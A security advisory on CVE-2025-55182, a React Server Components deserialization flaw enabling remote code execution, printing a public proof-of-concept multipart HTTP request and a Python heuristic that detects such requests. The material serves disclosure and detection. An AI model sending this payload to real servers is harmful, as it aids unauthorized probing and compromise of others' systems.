React Server Components Remote Code Execution Vulnerability (CVE-2025-55182)

Date: 2025-12-04 | Affected software: React Server Components | PoC: public

Vulnerability description

React Server Components lacks the necessary validation when deserializing data from a reply Flight stream. An attacker can craft arbitrary model fields, cyclic structures, server references and multipart/form-data content to push the parsing flow into an abnormal path that triggers module loading and a reference-execution chain, ultimately leading to unauthorized code execution.

PoC code (public)

https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/
https://github.com/msanft/CVE-2025-55182

POST / HTTP/1.1
Host: 
Next-Action: x
X-Nextjs-Request-Id: b6dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

{}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

["$1:a:a"]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
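An added detection heuristic, written for this advisory (example code, not the React or Next.js project's own, and not the detection mechanism published at the link above): it flags a request that carries a Next-Action header together with a multipart/form-data field whose value contains a `$`-reference with ':'-separated path segments, the shape seen in the PoC. The header handling, the reference pattern and the field parsing are assumptions derived from the PoC request; the Host value is a placeholder.

```python
import re

# A Flight reference with path segments, e.g. "$1:a:a" (pattern assumed from the PoC shape)
REF_WITH_PATH = re.compile(r'"\$\d+(?::[^":]+)+"')

def parse_request(raw: bytes):
    """Split a raw HTTP request into request line, lower-cased header dict and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().decode().lower()] = v.strip().decode()
    return lines[0].decode(), headers, body

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data splitter; returns {field name: raw value}."""
    parts, delim = {}, b"--" + boundary.encode()
    for chunk in body.split(delim):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":  # leading empty piece / closing delimiter
            continue
        part_head, _, part_body = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_head)
        if m:
            parts[m.group(1).decode()] = part_body.strip(b"\r\n").decode(errors="replace")
    return parts

def inspect(raw: bytes) -> list:
    """Return one finding per suspicious form field; [] when the request does not match."""
    _, headers, body = parse_request(raw)
    if "next-action" not in headers:  # only server-action requests are of interest
        return []
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;]+)", ctype)
    if not ctype.startswith("multipart/form-data") or not m:
        return []
    return [f"field {name!r}: Flight reference with path segments {value}"
            for name, value in parse_multipart(body, m.group(1)).items()
            if REF_WITH_PATH.search(value)]

# Constructed inputs: the PoC request from this advisory (placeholder Host), and the
# same request without the Next-Action header, which the heuristic must not flag.
POC_REQUEST = (b"POST / HTTP/1.1\r\nHost: app.example\r\nNext-Action: x\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n\r\n"
    b'------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name="1"\r\n\r\n{}\r\n'
    b'------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name="0"\r\n\r\n["$1:a:a"]\r\n'
    b"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n")
BENIGN_REQUEST = POC_REQUEST.replace(b"Next-Action: x\r\n", b"")
```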
